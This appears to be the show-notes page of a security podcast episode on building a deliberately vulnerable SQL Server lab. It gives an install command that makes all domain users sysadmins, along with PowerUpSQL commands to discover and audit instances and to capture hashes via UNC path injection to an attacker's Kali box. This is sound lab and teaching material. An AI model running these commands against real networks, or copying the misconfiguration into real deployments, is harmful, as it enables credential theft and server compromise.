7MS #567: How to Build an Intentionally Vulnerable SQL Server

7 Minute Security

Apr 14 2023 • 39 mins

Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode:

  • Download SQL Server here

  • Install SQL via config .ini file

  • Or, install SQL via pure command line

  • Deploy SQL with a service account while also starting TCP/IP and named pipes automagically:

setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1 /SQLSVCACCOUNT="YOURDOMAIN\YOUR-SERVICE-ACCOUNT" /SQLSVCPASSWORD="YOUR PASSWORD" /SQLSYSADMINACCOUNTS="YOURDOMAIN\administrator" "YOURDOMAIN\domain users" $Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"}
  • Audit the discovered SQL servers:
Get-SQLInstanceDomain -verbose | invoke-sqlaudit -verbose
  • Fire off stored procedures to catch hashes!
Invoke-SQLUncPathInjection -verbose -captureIP IP.OF-YOUR.KALI.BOX

You Might Like

Darknet Diaries
Darknet Diaries
Jack Rhysider
Hard Fork
Hard Fork
The New York Times
Marketplace Tech
Marketplace Tech
Marketplace
WSJ’s The Future of Everything
WSJ’s The Future of Everything
The Wall Street Journal
TechStuff
TechStuff
iHeartPodcasts
Rich On Tech
Rich On Tech
Rich DeMuro
Acquired
Acquired
Ben Gilbert and David Rosenthal
Fortnite Emotes
Fortnite Emotes
Lawrence Hopkinson
The Vergecast
The Vergecast
The Verge
Waveform: The MKBHD Podcast
Waveform: The MKBHD Podcast
Vox Media Podcast Network